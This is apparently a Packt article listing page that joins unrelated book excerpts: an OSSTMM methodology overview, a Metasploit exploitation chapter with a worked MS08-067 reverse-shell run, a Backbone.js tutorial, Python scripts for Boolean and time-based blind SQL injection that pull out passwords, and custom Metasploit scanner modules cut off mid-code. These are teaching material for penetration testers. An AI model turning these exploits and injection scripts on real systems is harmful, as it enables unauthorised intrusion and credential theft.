of communication and interaction with these assets, which can be physical, spectrum, and communication. All of these channels depict a unique set of security components that has to be tested and verified during the assessment period. These components comprise of physical security, human psychology, data networks, wireless communication medium, and telecommunication. The index is a method which is considerably useful while classifying these target assets corresponding to their particular identifications, such as, MAC Address, and IP Address. At the end, a vector concludes the direction by which an auditor can assess and analyze each functional asset. This whole process initiates a technical roadmap towards evaluating the target environment thoroughly and is known as Audit Scope. There are different forms of security testing which have been classified under OSSTMM methodology and their organization is presented within six standard security test types: Blind: The blind testing does not require any prior knowledge about the target system. But the target is informed before the execution of an audit scope. Ethical hacking and war gaming are examples of blind type testing. This kind of testing is also widely accepted because of its ethical vision of informing a target in advance. Double blind: In double blind testing, an auditor does not require any knowledge about the target system nor is the target informed before the test execution. Black-box auditing and penetration testing are examples of double blind testing. Most of the security assessments today are carried out using this strategy, thus, putting a real challenge for auditors to select the best of breed tools and techniques in order to achieve their required goal. Gray box: In gray box testing, an auditor holds limited knowledge about the target system and the target is also informed before the test is executed. Vulnerability assessment is one of the basic examples of gray box testing. Double gray box: The double gray box testing works in a similar way to gray box testing, except the time frame for an audit is defined and there are no channels and vectors being tested. White-box audit is an example of double gray box testing. Tandem: In tandem testing, the auditor holds minimum knowledge to assess the target system and the target is also notified in advance before the test is executed. It is fairly noted that the tandem testing is conducted thoroughly. Crystal box and in-house audit are examples of tandem testing. Reversal: In reversal testing, an auditor holds full knowledge about the target system and the target will never be informed of how and when the test will be conducted. Red-teaming is an example of reversal type testing. Which OSSTMM test type follows the rules of Penetration Testing? Double blind testing The technical assessment framework provided by OSSTMM is flexible and capable of deriving certain test cases which are logically divided into five security components of three consecutive channels, as mentioned previously. These test cases generally examine the target by assessing its access control security, process security, data controls, physical location, perimeter protection, security awareness level, trust level, fraud control protection, and many other procedures. The overall testing procedures focus on what has to be tested, how it should be tested, what tactics should be applied before, during and after the test, and how to interpret and correlate the final results. Capturing the current state of protection of a target system by using security metrics is considerably useful and invaluable. Thus, the OSSTMM methodology has introduced this terminology in the form of RAV (Risk Assessment Values). The basic function of RAV is to analyze the test results and compute the actual security value based on three factors, which are operational security, loss controls, and limitations. This final security value is known as RAV Score. By using RAV score an auditor can easily extract and define the milestones based on the current security posture to accomplish better protection. From a business perspective, RAV can optimize the amount of investment required on security and may help in the justification of better available solutions. Key features and benefits Practicing the OSSTMM methodology substantially reduces the occurrence of false negatives and false positives and provides accurate measurement for the security. Its framework is adaptable to many types of security tests, such as penetration testing, white-box audit, vulnerability assessment, and so forth. It ensures the assessment should be carried out thoroughly and that of the results can be aggregated into consistent, quantifiable, and reliable manner. The methodology itself follows a process of four individually connected phases, namely definition phase, information phase, regulatory phase, and controls test phase. Each of which obtain, assess, and verify the information regarding the target environment. Evaluating security metrics can be achieved using the RAV method. The RAV calculates the actual security value based on operational security, loss controls, and limitations. The given output known as the RAV score represents the current state of target security. Formalizing the assessment report using the Security Test Audit Report (STAR) template can be advantageous to management, as well as the technical team to review the testing objectives, risk assessment values, and the output from each test phase. The methodology is regularly updated with new trends of security testing, regulations, and ethical concerns. The OSSTMM process can easily be coordinated with industry regulations, business policy, and government legislations. Additionally, a certified audit can also be eligible for accreditation from ISECOM (Institute for Security and Open Methodologies) directly.
Read more
  • 0
  • 0
  • 8621

article-image-target-exploitation
Packt
14 Mar 2014
14 min read
Save for later

Target Exploitation

Packt
14 Mar 2014
14 min read
(For more resources related to this topic, see here.) Vulnerability research Understanding the capabilities of a specific software or hardware product may provide a starting point for investigating vulnerabilities that could exist in that product. Conducting vulnerability research is not easy, neither is it a one-click task. Thus, it requires a strong knowledge base with different factors to carry out security analysis. The following are the factors to carry out security analysis: Programming skills: This is a fundamental factor for ethical hackers. Learning the basic concepts and structures that exist with any programming language should grant the tester with an imperative advantage of finding vulnerabilities. Apart from the basic knowledge of programming languages, you must be prepared to deal with the advanced concepts of processors, system memory, buffers, pointers, data types, registers, and cache. These concepts are implementable in almost any programming language such as C/C++, Python, Perl, and Assembly. To learn the basics of writing an exploit code from a discovered vulnerability, please visit http://www.phreedom.org/presentations/exploit-code-development/. Reverse engineering: This is another wide area for discovering the vulnerabilities that could exist in the electronic device, software, or system by analyzing its functions, structures, and operations. The purpose is to deduce a code from a given system without any prior knowledge of its internal working, to examine it for error conditions, poorly designed functions, and protocols, and to test the boundary conditions. There are several reasons that inspire the practice of reverse engineering skills such as the removal of copyright protection from a software, security auditing, competitive technical intelligence, identification of patent infringement, interoperability, understanding the product workflow, and acquiring the sensitive data. Reverse engineering adds two layers of concept to examine the code of an application: source code auditing and binary auditing. If you have access to the application source code, you can accomplish the security analysis through automated tools or manually study the source in order to extract the conditions where vulnerability can be triggered. On the other hand, binary auditing simplifies the task of reverse engineering where the application exists without any source code. Disassemblers and decompilers are two generic types of tools that may assist the auditor with binary analysis. Disassemblers generate the assembly code from a complied binary program, while decompilers generate a high-level language code from a compiled binary program. However, dealing with either of these tools is quite challenging and requires a careful assessment. Instrumented tools: Instrumented tools such as debuggers, data extractors, fuzzers, profilers, code coverage, flow analyzers, and memory monitors play an important role in the vulnerability discovery process and provide a consistent environment for testing purposes. Explaining each of these tool categories is out of the scope of this book. However, you may find several useful tools already present under Kali Linux. To keep a track of the latest reverse code engineering tools, we strongly recommend that you visit the online library at http://www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools. Exploitability and payload construction: This is the final step in writing the proof-of-concept (PoC) code for a vulnerable element of an application, which could allow the penetration tester to execute custom commands on the target machine. We apply our knowledge of vulnerable applications from the reverse engineering stage to polish shellcode with an encoding mechanism in order to avoid bad characters that may result in the termination of the exploit process. Depending on the type and classification of vulnerability discovered, it is very significant to follow the specific strategy that may allow you to execute an arbitrary code or command on the target system. As a professional penetration tester, you may always be looking for loopholes that should result in getting a shell access to your target operating system. Thus, we will demonstrate a few scenarios with the Metasploit framework, which will show these tools and techniques. Vulnerability and exploit repositories For many years, a number of vulnerabilities have been reported in the public domain. Some of these were disclosed with the PoC exploit code to prove the feasibility and viability of a vulnerability found in the specific software or application. And, many still remain unaddressed. This competitive era of finding the publicly available exploits and vulnerability information makes it easier for penetration testers to quickly search and retrieve the best available exploit that may suit their target system environment. You can also port one type of exploit to another type (for example, Win32 architecture to Linux architecture) provided that you hold intermediate programming skills and a clear understanding of OS-specific architecture. We have provided a combined set of online repositories that may help you to track down any vulnerability information or its exploit by searching through them. Not every single vulnerability found has been disclosed to the public on the Internet. Some are reported without any PoC exploit code, and some do not even provide detailed vulnerability information. For this reason, consulting more than one online resource is a proven practice among many security auditors. The following is a list of online repositories: Repository name Website URL Bugtraq SecurityFocus http://www.securityfocus.com OSVDB Vulnerabilities http://osvdb.org Packet Storm http://www.packetstormsecurity.org VUPEN Security http://www.vupen.com National Vulnerability Database http://nvd.nist.gov ISS X-Force http://xforce.iss.net US-CERT Vulnerability Notes http://www.kb.cert.org/vuls US-CERT Alerts http://www.us-cert.gov/cas/techalerts/ SecuriTeam http://www.securiteam.com Government Security Org http://www.governmentsecurity.org Secunia Advisories http://secunia.com/advisories/historic/ Security Reason http://securityreason.com XSSed XSS-Vulnerabilities http://www.xssed.com Security Vulnerabilities Database http://securityvulns.com SEBUG http://www.sebug.net BugReport http://www.bugreport.ir MediaService Lab http://lab.mediaservice.net Intelligent Exploit Aggregation Network http://www.intelligentexploit.com Hack0wn http://www.hack0wn.com Although there are many other Internet resources available, we have listed only a few reviewed ones. Kali Linux comes with an integration of exploit database from Offensive Security. This provides an extra advantage of keeping all archived exploits to date on your system for future reference and use. To access Exploit-DB, execute the following commands on your shell: # cd /usr/share/exploitdb/ # vim files.csv This will open a complete list of exploits currently available from Exploit-DB under the /pentest/exploits/exploitdb/platforms/ directory. These exploits are categorized in their relevant subdirectories based on the type of system (Windows, Linux, HP-UX, Novell, Solaris, BSD, IRIX, TRU64, ASP, PHP, and so on). Most of these exploits were developed using C, Perl, Python, Ruby, PHP, and other programming technologies. Kali Linux already comes with a handful set of compilers and interpreters that support the execution of these exploits. How to extract particular information from the exploits list? Using the power of bash commands, you can manipulate the output of any text file in order to retrieve the meaningful data. You can either use searchsploit, or this can also be accomplished by typing cat files.csv |grep '"' |cut -d";" -f3 on your console. It will extract the list of exploit titles from a files.csv file. To learn the basic shell commands, please refer to http://tldp.org/LDP/abs/html/index.html. Advanced exploitation toolkit Kali Linux is preloaded with some of the best and most advanced exploitation toolkits. The Metasploit framework (http://www.metasploit.com) is one of these. We have explained it in a greater detail and presented a number of scenarios that would effectively increase the productivity and enhance your experience with penetration testing. The framework was developed in the Ruby programming language and supports modularization such that it makes it easier for the penetration tester with optimum programming skills to extend or develop custom plugins and tools. The architecture of a framework is divided into three broad categories: libraries, interfaces, and modules. A key part of our exercises is to focus on the capabilities of various interfaces and modules. Interfaces (console, CLI, web, and GUI) basically provide the front-end operational activity when dealing with any type of modules (exploits, payloads, auxiliaries, encoders, and NOP). Each of the following modules have their own meaning and are function-specific to the penetration testing process. Exploit: This module is the proof-of-concept code developed to take advantage of a particular vulnerability in a target system Payload: This module is a malicious code intended as a part of an exploit or independently compiled to run the arbitrary commands on the target system Auxiliaries: These modules are the set of tools developed to perform scanning, sniffing, wardialing, fingerprinting, and other security assessment tasks Encoders: These modules are provided to evade the detection of antivirus, firewall, IDS/IPS, and other similar malware defenses by encoding the payload during a penetration operation No Operation or No Operation Performed (NOP): This module is an assembly language instruction often added into a shellcode to perform nothing but to cover a consistent payload space For your understanding, we have explained the basic use of two well-known Metasploit interfaces with their relevant command-line options. Each interface has its own strengths and weaknesses. However, we strongly recommend that you stick to a console version as it supports most of the framework features. MSFConsole MSFConsole is one of the most efficient, powerful, and all-in-one centralized front-end interface for penetration testers to make the best use of the exploitation framework. To access msfconsole, navigate to Applications | Kali Linux | Exploitation Tools | Metasploit | Metasploit framework or use the terminal to execute the following command: # msfconsole You will be dropped into an interactive console interface. To learn about all the available commands, you can type the following command: msf > help This will display two sets of commands; one set will be widely used across the framework, and the other will be specific to the database backend where the assessment parameters and results are stored. Instructions about other usage options can be retrieved through the use of -h, following the core command. Let us examine the use of the show command as follows: msf > show -h [*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, plugins, options [*] Additional module-specific parameters are: advanced, evasion, targets, actions This command is typically used to display the available modules of a given type or all of the modules. The most frequently used commands could be any of the following: show auxiliary: This command will display all the auxiliary modules show exploits: This command will get a list of all the exploits within the framework show payloads: This command will retrieve a list of payloads for all platforms. However, using the same command in the context of a chosen exploit will display only compatible payloads. For instance, Windows payloads will only be displayed with the Windows-compatible exploits show encoders: This command will print the list of available encoders show nops: This command will display all the available NOP generators show options: This command will display the settings and options available for the specific module show targets: This command will help us to extract a list of target OS supported by a particular exploit module show advanced: This command will provide you with more options to fine-tune your exploit execution We have compiled a short list of the most valuable commands in the following table; you can practice each one of them with the Metasploit console. The italicized terms next to the commands will need to be provided by you: Commands Description check To verify a particular exploit against your vulnerable target without exploiting it. This command is not supported by many exploits. connect ip port Works similar to that of Netcat and Telnet tools. exploit To launch a selected exploit. run To launch a selected auxiliary. jobs Lists all the background modules currently running and provides the ability to terminate them. route add subnet netmask sessionid To add a route for the traffic through a compromised session for network pivoting purposes. info module Displays detailed information about a particular module (exploit, auxiliary, and so on). set param value To configure the parameter value within a current module. setg param value To set the parameter value globally across the framework to be used by all exploits and auxiliary modules. unset param It is a reverse of the set command. You can also reset all variables by using the unset all command at once. unsetg param To unset one or more global variables. sessions Ability to display, interact, and terminate the target sessions. Use with -l for listing, -i ID for interaction, and -k ID for termination. search string Provides a search facility through module names and descriptions. use module Select a particular module in the context of penetration testing. It is important for you to understand their basic use with different sets of modules within the framework. MSFCLI Similar to the MSFConsole interface, a command-line interface (CLI) provides an extensive coverage of various modules that can be launched at any one instance. However, it lacks some of the advanced automation features of MSFConsole. To access msfcli, use the terminal to execute the following command: # msfcli -h This will display all the available modes similar to that of MSFConsole as well as usage instructions for selecting the particular module and setting its parameters. Note that all the variables or parameters should follow the convention of param=value and that all options are case-sensitive. We have presented a small exercise to select and execute a particular exploit as follows: # msfcli windows/smb/ms08_067_netapi O [*] Please wait while we load the module tree...      Name     Current Setting  Required  Description    ----     ---------------  --------  -----------    RHOST                     yes       The target address    RPORT    445              yes       Set the SMB service port    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC) The use of O at the end of the preceding command instructs the framework to display the available options for the selected exploit. The following command sets the target IP using the RHOST parameter: # msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 P [*] Please wait while we load the module tree...   Compatible payloads ===================      Name                             Description    ----                             -----------    generic/debug_trap               Generate a debug trap in the target process    generic/shell_bind_tcp           Listen for a connection and spawn a command shell ... Finally, after setting the target IP using the RHOST parameter, it is time to select the compatible payload and execute our exploit as follows: # msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 LHOST=192.168.0.3 PAYLOAD=windows/shell/reverse_tcp E [*] Please wait while we load the module tree... [*] Started reverse handler on 192.168.0.3:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (240 bytes) to 192.168.0.7 [*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1027)   Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.   C:WINDOWSsystem32> As you can see, we have acquired a local shell access to our target machine after setting the LHOST parameter for a chosen payload.
Read more
  • 0
  • 0
  • 8444

article-image-building-app-using-backbonejs
Packt
29 Jul 2013
7 min read
Save for later

Building an app using Backbone.js

Packt
29 Jul 2013
7 min read
(For more resources related to this topic, see here.) Building a Hello World app For building the app you will need the necessary script files and a project directory laid out. Let's begin writing some code. This code will require all scripts to be accessible; otherwise we'll see some error messages. We'll also go over the Web Inspector and use it to interact with our applications. Learning this tool is essential for any web application developer to proficiently debug (and even write new code for) their application. Step 1 – adding code to the document Add the following code to the index.html file. I'm assuming the use of LoDash and Zepto, so you'll want to update the code accordingly: <!DOCTYPE HTML> <html> <head> <title>Backbone Application Development Starter</title> <!-- Your Utility Library --> <script src ="scripts/lodash-1.3.1.js"></script> <!-- Your Selector Engine --> <script src ="scripts/zepto-1.0.js"></script> <script src ="scripts/backbone-1.0.0.js"></script> </head> <body> <div id="display"> <div class ="listing">Houston, we have a problem.</div> </div> </body> <script src ="scripts/main.js"></script> </html> This file will load all of our scripts and has a simple <div>, which displays some content. I have placed the loading of our main.js file after the closing <body> tag. This is just a personal preference of mine; it will ensure that the script is executed after the elements of the DOM have been populated. If you were to place it adjacent to the other scripts, you would need to encapsulate the contents of the script with a function call so that it gets run after the DOM has loaded; otherwise, when the script runs and tries to find the div#display element, it will fail. Step 2 – adding code to the main script Now, add the following code to your scripts/main.js file: var object = {};_.extend(object, Backbone.Events);object.on("show-message", function(msg) {$('#display .listing').text(msg);});object.trigger("show-message", "Hello World"); Allow me to break down the contents of main.js so that you know what each line does. var object = {}; The preceding line should be pretty obvious. We're just creating a new object, aptly named object, which contains no attributes. _.extend(object, Backbone.Events); The preceding line is where the magic starts to happen. The utility library provides us with many functions, one of which is extend. This function takes two or more objects as its arguments, copies the attributes from them, and appends them to the first object. You can think of this as sort of extending a class in a classical language (such as PHP). Using the extend utility function is the preferred way of adding Backbone functionality to your classes. In this case, our object is now a Backbone Event object, which means it can be used for triggering events and running callback functions when an event is triggered. By extending your objects in this manner, you have a common method for performing event-based actions in your code, without having to write one-off implementations. object.on("show-message", function(msg) {$('#display .listing').text(msg);}); The preceding code adds an event listener to our object. The first argument to the on function is the name of the event, in this case show-message. This is a simple string that describes the event you are listening for and will be used later for triggering the events. There isn't a requirement as far as naming conventions go, but try to be descriptive and consistent. The second argument is a callback function, which takes an argument that can be set at the time the event is triggered. The callback function here is pretty simple; it just queries the DOM using our selector engine and updates the text of the element to be the text passed into the e vent. object.trigger("show-message", "Hello World"); Finally, we trigger our event. Simply use the trigger function on the object, tell it that we are triggering the show-message event, and pass in the argument for the trigger callback as the second argument. Step 3 – opening the project in your browser This will show us the text Hello World when we open our index.html file in our browser. Don't believe me? Double click on the file now, and you should see the following screen: If Chrome isn't your default browser, you should be able to right-click on the file from within your file browser and there should be a way to choose which application to open the file with. Chrome should be in that list if it was installed properly. Step 4 – encountering a problem Do you see something other than our happy Hello World message? The code is set up in a way that it should display the message Houston , we have a problem if something were to go wrong (this text is what is displayed in the DOM by default, before having JavaScript run and replace it). The missing script file The first place to look for the problem is the Network tab of the Web Inspector. This tab shows us each of the files that were downloaded by the browser to satisfy the rendering of the page. Sometimes, the Console tab will also tell us when a file wasn't properly downloaded, but not always. The following screenshot explains this: If you look at the Network tab, you can see an item clearly marked in red ( backbone-1.0.0.js ). In my project folder, I had forgotten to download the Backbone library file, thus the browser wasn't able to load the file. Note that we are loading the file from the local filesystem, so the status column says either Success or Failure . If these files were being loaded from a real web server, you would see the actual HTTP status codes, such as 200 OK for a successful file download or 404 Not Found for a missing file. The script typo Perhaps you have made a typo in the script while copying it from the book. If you have any sort of issues resulting from incorrect JavaScript, they will be visible in the Console tab, as shown in the following screenshot: In my example, I had forgotten the line about extending my object with the Backbone events class. Having left out the extend line of code caused the object to be missing some functionality, specifically the method on(). Notice how the console displays which filename and line number the error is on. Feel free to remove and add code to the files and refresh the page to get a feel for what the errors look like in the console. This is a great way to get a feel for debugging Backbone-based (and, really, any JavaScript) applications. Summary In this article we learned how to develop an app using Backbone.js. Resources for Article : Further resources on this subject: JBoss Portals and AJAX - Part 1 [Article] Getting Started with Zombie.js [Article] DWR Java AJAX User Interface: Basic Elements (Part 1) [Article]
Read more
  • 0
  • 0
  • 8383
article-image-sql-injection
Packt
23 Jun 2015
11 min read
Save for later

SQL Injection

Packt
23 Jun 2015
11 min read
In this article by Cameron Buchanan, Terry Ip, Andrew Mabbitt, Benjamin May, and Dave Mound authors of the book Python Web Penetration Testing Cookbook, we're going to create scripts that encode attack strings, perform attacks, and time normal actions to normalize attack times. (For more resources related to this topic, see here.) Exploiting Boolean SQLi There are times when all you can get from a page is a yes or no. It's heartbreaking until you realise that that's the SQL equivalent of saying "I LOVE YOU". All SQLi can be broken down into yes or no questions, dependant on how patient you are. We will create a script that takes a yes value, and a URL and returns results based on a predefined attack string. I have provided an example attack string but this will change dependant on the system you are testing. How to do it… The following script is how yours should look: import requests import sys   yes = sys.argv[1]   i = 1 asciivalue = 1   answer = [] print "Kicking off the attempt"   payload = {'injection': ''AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'}   while True: req = requests.post('<target url>' data=payload) lengthtest = req.text if yes in lengthtest:    length = i    break else:    i = i+1   for x in range(1, length): while asciivalue < 126: payload = {'injection': ''AND (substr(password, '+str(x)+', 1)) = '+ chr(asciivalue)+';#', 'Submit': 'submit'}    req = requests.post('<target url>', data=payload)    if yes in req.text:    answer.append(chr(asciivalue)) break else:      asciivalue = asciivalue + 1      pass asciivalue = 0 print "Recovered String: "+ ''.join(answer) How it works… Firstly the user must identify a string that only occurs when the SQLi is successful. Alternatively, the script may be altered to respond to the absence of proof of a failed SQLi. We provide this string as a sys.argv. We also create the two iterators we will use in this script and set them to 1 as MySQL starts counting from 1 instead of 0 like the failed system it is. We also create an empty list for our future answer and instruct the user the script is starting. yes = sys.argv[1]   i = 1 asciivalue = 1 answer = [] print "Kicking off the attempt" Our payload here basically requests the length of the password we are attempting to return and compares it to a value that will be iterated: payload = {'injection': ''AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'} We then repeat the next loop forever as we have no idea how long the password is. We submit the payload to the target URL in a POST request: while True: req = requests.post('<target url>' data=payload) Each time we check to see if the yes value we set originally is present in the response text and if so, we end the while loop setting the current value of i as the parameter length. The break command is the part that ends the while loop: lengthtest = req.text if yes in lengthtest:    length = i    break If we don't detect the yes value, we add one to i and continue the loop: else:    i = i+1re Using the identified length of the target string, we iterate through each character and, using the ascii value, each possible value of that character. For each value we submit it to the target URL. Because the ascii table only runs up to 127, we cap the loop to run until the ascii value has reached 126. If it reaches 127, something has gone wrong: for x in range(1, length): while asciivalue < 126:  payload = {'injection': ''AND (substr(password, '+str(x)+', 1)) = '+ chr(asciivalue)+';#', 'Submit': 'submit'}    req = requests.post('<target url>', data=payload) We check to see if our yes string is present in the response and if so, break to go onto the next character. We append our successful to our answer string in character form, converting it with the chr command: if yes in req.text:    answer.append(chr(asciivalue)) break If the yes value is not present, we add to the ascii value to move onto the next potential character for that position and pass: else:      asciivalue = asciivalue + 1      pass Finally we reset ascii value for each loop and then when the loop hits the length of the string, we finish, printing the whole recovered string: asciivalue = 1 print "Recovered String: "+ ''.join(answer) There's more… This script could be potentially altered to handle iterating through tables and recovering multiple values through better crafted SQL Injection strings. Ultimately, this provides a base plate, as with the later Blind SQL Injection script for developing more complicated and impressive scripts to handle challenging tasks. See the Blind SQL Injection script for an advanced implementation of these concepts. Exploiting Blind SQL Injection Sometimes life hands you lemons, Blind SQL Injection points are some of those lemons. When you're reasonably sure you've found an SQL Injection vulnerability but there are no errors and you can't get it to return you data. In these situations you can use timing commands within SQL to cause the page to pause in returning a response and then use that timing to make judgements about the database and its data. We will create a script that makes requests to the server and returns differently timed responses dependant on the characters it's requesting. It will then read those times and reassemble strings. How to do it… The script is as follows: import requests   times = [] print "Kicking off the attempt" cookies = {'cookie name': 'Cookie value'}   payload = {'injection': ''or sleep char_length(password);#', 'Submit': 'submit'} req = requests.post('<target url>' data=payload, cookies=cookies) firstresponsetime = str(req.elapsed.total_seconds)   for x in range(1, firstresponsetime): payload = {'injection': ''or sleep(ord(substr(password, '+str(x)+', 1)));#', 'Submit': 'submit'} req = requests.post('<target url>', data=payload, cookies=cookies) responsetime = req.elapsed.total_seconds a = chr(responsetime)    times.append(a)    answer = ''.join(times) print "Recovered String: "+ answer How it works… As ever we import the required libraries and declare the lists we need to fill later on. We also have a function here that states that the script has indeed started. With some time-based functions, the user can be left waiting a while. In this script I have also included cookies using the request library. It is likely for this sort of attack that authentication is required: times = [] print "Kicking off the attempt" cookies = {'cookie name': 'Cookie value'} We set our payload up in a dictionary along with a submit button. The attack string is simple enough to understand with explanation. The initial tick has to be escaped to be treated as text within the dictionary. That tick breaks the SQL command initially and allows us to input our own SQL commands. Next we say in the event of the first command failing perform the following command with OR. We then tell the server to sleep one second for every character in the first row in the password column. Finally we close the statement with a semi-colon and comment out any trailing characters with a hash (or pound if you're American and/or wrong): payload = {'injection': ''or sleep char_length(password);#', 'Submit': 'submit'} We then set length of time the server took to respond as the firstreponsetime parameter. We will use this to understand how many characters we need to brute-force through this method in the following chain: firstresponsetime = str(req.elapsed).total_seconds We create a loop which will set x to be all numbers from 1 to the length of the string identified and perform an action for each one. We start from 1 here because MySQL starts counting from 1 rather than from zero like Python: for x in range(1, firstresponsetime): We make a similar payload as before but this time we are saying sleep for the ascii value of X character of the password in the password column, row one. So if the first character was a lower case a then the corresponding ascii value is 97 and therefore the system would sleep for 97 seconds, if it was a lower case b it would sleep for 98 seconds and so on: payload = {'injection': ''or sleep(ord(substr(password, '+str(x)+', 1)));#', 'Submit': 'submit'} We submit our data each time for each character place in the string: req = requests.post('<target url>', data=payload, cookies=cookies) We take the response time from each request to record how long the server sleeps and then convert that time back from an ascii value into a letter: responsetime = req.elapsed.total_seconds a = chr(responsetime) For each iteration we print out the password as it is currently known and then eventually print out the full password: answer = ''.join(times) print "Recovered String: "+ answer There's more… This script provides a framework that can be adapted to many different scenarios. Wechall, the web app challenge website, sets a time-limited, blind SQLi challenge that has to be completed in a very short time period. The following is our original script adapted to this environment. As you can see, I've had to account for smaller time differences in differing values, server lag and also incorporated a checking method to reset the testing value each time and submit it automatically: import subprocess import requests   def round_down(num, divisor):    return num - (num%divisor)   subprocess.Popen(["modprobe pcspkr"], shell=True) subprocess.Popen(["beep"], shell=True)     values = {'0': '0', '25': '1', '50': '2', '75': '3', '100': '4', '125': '5', '150': '6', '175': '7', '200': '8', '225': '9', '250': 'A', '275': 'B', '300': 'C', '325': 'D', '350': 'E', '375': 'F'} times = [] answer = "This is the first time" cookies = {'wc': 'cookie'} setup = requests.get('http://www.wechall.net/challenge/blind_lighter/ index.php?mo=WeChall&me=Sidebar2&rightpanel=0', cookies=cookies) y=0 accum=0   while 1: reset = requests.get('http://www.wechall.net/challenge/blind_lighter/ index.php?reset=me', cookies=cookies) for line in reset.text.splitlines():    if "last hash" in line:      print "the old hash was:"+line.split("      ")[20].strip(".</li>")      print "the guessed hash:"+answer      print "Attempts reset n n"    for x in range(1, 33):      payload = {'injection': ''or IF (ord(substr(password,      '+str(x)+', 1)) BETWEEN 48 AND      57,sleep((ord(substr(password, '+str(x)+', 1))-      48)/4),sleep((ord(substr(password, '+str(x)+', 1))-      55)/4));#', 'inject': 'Inject'}      req = requests.post('http://www.wechall.net/challenge/blind_lighter/ index.php?ajax=1', data=payload, cookies=cookies)      responsetime = str(req.elapsed)[5]+str(req.elapsed)[6]+str(req.elapsed) [8]+str(req.elapsed)[9]      accum = accum + int(responsetime)      benchmark = int(15)      benchmarked = int(responsetime) - benchmark      rounded = str(round_down(benchmarked, 25))      if rounded in values:        a = str(values[rounded])        times.append(a)        answer = ''.join(times)      else:        print rounded        rounded = str("375")        a = str(values[rounded])        times.append(a)        answer = ''.join(times) submission = {'thehash': str(answer), 'mybutton': 'Enter'} submit = requests.post('http://www.wechall.net/challenge/blind_lighter/ index.php', data=submission, cookies=cookies) print "Attempt: "+str(y) print "Time taken: "+str(accum) y += 1 for line in submit.text.splitlines():    if "slow" in line:      print line.strip("<li>")    elif "wrong" in line:       print line.strip("<li>") if "wrong" not in submit.text:    print "possible success!"    #subprocess.Popen(["beep"], shell=True) Summary We looked at how to attack strings through different penetration attacks via Boolean SQLi and Blind SQL Injection. You will find some various kinds of attacks present in the book throughout. Resources for Article: Further resources on this subject: Pentesting Using Python [article] Wireless and Mobile Hacks [article] Introduction to the Nmap Scripting Engine [article]
Read more
  • 0
  • 0
  • 8207

article-image-metasploit-custom-modules-and-meterpreter-scripting
Packt
03 Jun 2014
10 min read
Save for later

Metasploit Custom Modules and Meterpreter Scripting

Packt
03 Jun 2014
10 min read
(For more resources related to this topic, see here.) Writing out a custom FTP scanner module Let's try and build a simple module. We will write a simple FTP fingerprinting module and see how things work. Let's examine the code for the FTP module: require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Apex FTP Detector', 'Description' => '1.0', 'Author' => 'Nipun Jaswal', 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(21), ], self.class) End We start our code by defining the required libraries to refer to. We define the statement require 'msf/core' to include the path to the core libraries at the very first step. Then, we define what kind of module we are creating; in this case, we are writing an auxiliary module exactly the way we did for the previous module. Next, we define the library files we need to include from the core library set. Here, the include Msf::Exploit::Remote::Ftp statement refers to the /lib/msf/core/exploit/ftp.rb file and include Msf::Auxiliary::Scanner refers to the /lib/msf/core/auxiliary/scanner.rb file. We have already discussed the scanner.rb file in detail in the previous example. However, the ftp.rb file contains all the necessary methods related to FTP, such as methods for setting up a connection, logging in to the FTP service, sending an FTP command, and so on. Next, we define the information of the module we are writing and attributes such as name, description, author name, and license in the initialize method. We also define what options are required for the module to work. For example, here we assign RPORT to port 21 by default. Let's continue with the remaining part of the module: def run_host(target_host) connect(true, false) if(banner) print_status("#{rhost} is running #{banner}") end disconnect end end We define the run_host method, which will initiate the process of connecting to the target by overriding the run_host method from the /lib/msf/core/auxiliary/scanner.rb file. Similarly, we use the connect function from the /lib/msf/core/exploit/ftp.rb file, which is responsible for initializing a connection to the host. We supply two parameters into the connect function, which are true and false. The true parameter defines the use of global parameters, whereas false turns off the verbose capabilities of the module. The beauty of the connect function lies in its operation of connecting to the target and recording the banner of the FTP service in the parameter named banner automatically, as shown in the following screenshot: Now we know that the result is stored in the banner attribute. Therefore, we simply print out the banner at the end and we disconnect the connection to the target. This was an easy module, and I recommend that you should try building simple scanners and other modules like these. Nevertheless, before we run this module, let's check whether the module we just built is correct with regards to its syntax or not. We can do this by passing the module from an in-built Metasploit tool named msftidy as shown in the following screenshot: We will get a warning message indicating that there are a few extra spaces at the end of line number 19. Therefore, when we remove the extra spaces and rerun msftidy, we will see that no error is generated. This marks the syntax of the module to be correct. Now, let's run this module and see what we gather: We can see that the module ran successfully, and it has the banner of the service running on port 21, which is Baby FTP Server. For further reading on the acceptance of modules in the Metasploit project, refer to https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements. Writing out a custom HTTP server scanner Now, let's take a step further into development and fabricate something a bit trickier. We will create a simple fingerprinter for HTTP services, but with a slightly more complex approach. We will name this file http_myscan.rb as shown in the following code snippet: require 'rex/proto/http' require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Server Service Detector', 'Description' => 'Detects Service On Web Server, Uses GET to Pull Out Information', 'Author' => 'Nipun_Jaswal', 'License' => MSF_LICENSE ) end We include all the necessary library files as we did for the previous modules. We also assign general information about the module in the initialize method, as shown in the following code snippet: def os_fingerprint(response) if not response.headers.has_key?('Server') return "Unknown OS (No Server Header)" end case response.headers['Server'] when /Win32/, /(Windows/, /IIS/ os = "Windows" when /Apache// os = "*Nix" else os = "Unknown Server Header Reporting: "+response.headers['Server'] end return os end def pb_fingerprint(response) if not response.headers.has_key?('X-Powered-By') resp = "No-Response" else resp = response.headers['X-Powered-By'] end return resp end def run_host(ip) connect res = send_request_raw({'uri' => '/', 'method' => 'GET' }) return if not res os_info=os_fingerprint(res) pb=pb_fingerprint(res) fp = http_fingerprint(res) print_status("#{ip}:#{rport} is running #{fp} version And Is Powered By: #{pb} Running On 